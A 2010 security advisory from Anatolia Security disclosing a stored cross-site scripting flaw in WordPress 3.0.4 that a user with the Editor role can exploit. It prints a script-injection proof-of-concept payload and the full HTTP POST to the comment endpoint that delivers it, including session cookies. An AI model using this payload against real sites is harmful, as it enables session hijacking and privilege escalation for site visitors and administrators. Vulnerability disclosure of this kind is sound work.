WordPress 3.0.4 Stored XSS (via Editor role)
2010-12-30 17:15:39ANATOLIA SECURITY ADVISORY
--------------------------------------
### ADVISORY INFO ###
+ Title: Wordpress 3.0.4 Stored XSS (Role: Editor)
+ Advisory URL: http://www.anatoliasecurity.com/adv/as-adv-2010-005.txt
+ Advisory ID: 2010-005
+ Versions: Wordpress 3.0.4, 3.0.3 (maybe earlies versions)
+ Date: 30/12/2010
+ Vendor: WordPress Blog Tool and Publishing Platform
+ Impact: Execute Malicious Javascript Codes
+ CWE-ID: 79 (Cross-site Scripting)
+ Credit: Anatolia Security
+ Author: Sir - sir[at]anatoliasecurity[dot]com
### VULNERABLE PRODUCT ###
+ Wordpress: "WordPress is web software you can use to create a beautiful website or blog. We like to say that WordPress is both free and priceless at the same time."
+ Homepage: http://wordpress.org
### VULNERABILITY DETAILS ###
+ Description: Attackers can execute malicious javascript codes or hijacking SESSION for privilege escalation. The attacker has to be the authority of the editor.
Screenshot: http://img3.imageshack.us/img3/1148/wordpressx.png
PoC: '"--></style></script><script>alert('XSS')</script>
POST http://localhost/wordpress304/wp-comments-post.php HTTP/1.1
Host: localhost
Connection: keep-alive
Referer: http://localhost/wordpress304/?page_id=2
Content-Length: 189
Cache-Control: max-age=0
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: ISO-8859-9,utf-8;q=0.7,*;q=0.3
Cookie: wp-settings-time-1=1293719651; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a9710e337f5b83061184233e85654d2c=editor%7C1293893085%7C1b3f84f58059c0fcf262ef1bb83635c2; wp-settings-time-3=1293720285
comment=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&submit=Post+Comment&comment_post_ID=2&comment_parent=0&_wp_unfiltered_html_comment=7741b495eb
Fixes
No fixesIn order to submit a new fix you need to be registered.